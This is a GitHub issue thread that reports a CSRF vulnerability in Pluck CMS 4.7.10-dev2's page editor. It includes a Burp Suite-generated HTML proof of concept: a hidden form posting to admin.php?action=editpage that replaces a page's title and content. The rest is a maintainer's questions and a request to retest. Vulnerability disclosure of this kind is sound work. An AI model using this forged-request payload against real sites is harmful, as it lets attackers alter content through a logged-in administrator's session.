An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage
F1sh1001 opened this issue · comments
CSRF POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/pluck/admin.php?action=editpage&page=111" method="POST">
<input type="hidden" name="title" value="evil" />
<input type="hidden" name="seo_name" value="111" />
<input type="hidden" name="content" value="evil" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="hidden" value="no" />
<input type="hidden" name="sub_page" value="" />
<input type="hidden" name="theme" value="oldstyle" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Where did you insert the script?? it is a javascript so it only resides in the client.
The /h1 wil not appear in the file on disk..
Please explain more.
Could you please test the latest dev release 4.7.10-dev4?
https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4
Have you retested with the latest dev version?
Sorry, I don't have much time. I'll try if I have time
…------------------ 原始邮件 ------------------
发件人: "Bas Steelooper"<notifications@github.com>;
发送时间: 2019年10月22日(星期二) 下午3:19
收件人: "pluck-cms/pluck"<pluck@noreply.github.com>;
抄送: "1113402387"<1113402387@qq.com>; "Author"<author@noreply.github.com>;
主题: Re: [pluck-cms/pluck] An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage (#81)
Have you retested with the latest dev version?
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub, or unsubscribe.